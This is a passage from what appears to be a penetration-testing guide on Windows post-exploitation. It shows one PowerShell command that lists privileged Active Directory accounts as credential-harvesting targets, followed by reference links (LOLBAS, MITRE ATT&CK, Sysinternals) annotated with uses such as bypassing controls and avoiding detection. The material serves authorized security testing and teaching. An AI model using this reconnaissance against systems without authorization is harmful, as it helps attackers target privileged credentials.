Get-ADUser -Filter {AdminCount -eq 1} -Properties *
# Find where these accounts are logged in
   Goal: Credential harvesting targets
   Strategy: Find systems where privileged users are active

📖 ESSENTIAL REFERENCES

LOLBAS Project

URL: https://lolbas-project.github.io/
Use: Comprehensive database of Windows binaries that can be abused
When: Planning operations, finding alternative tools, bypassing controls

MITRE ATT&CK Framework

URL: https://attack.mitre.org/
Use: Understand tactics, techniques, and procedures (TTPs)
Sections: Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration

PowerShell Documentation

URL: https://docs.microsoft.com/powershell/
Use: Cmdlet reference, scripting techniques, advanced features
When: Building custom scripts, understanding logging, avoiding detection

Windows Sysinternals

URL: https://docs.microsoft.com/sysinternals/
Tools: Sysmon (logging), ProcMon (monitoring), Autoruns (persistence checking)
Use: Understanding system behaviour, detection mechanisms

PreviousLiving Off the Land: Windows Post-Exploitation NextPost-Engagement

Last updated 23 days ago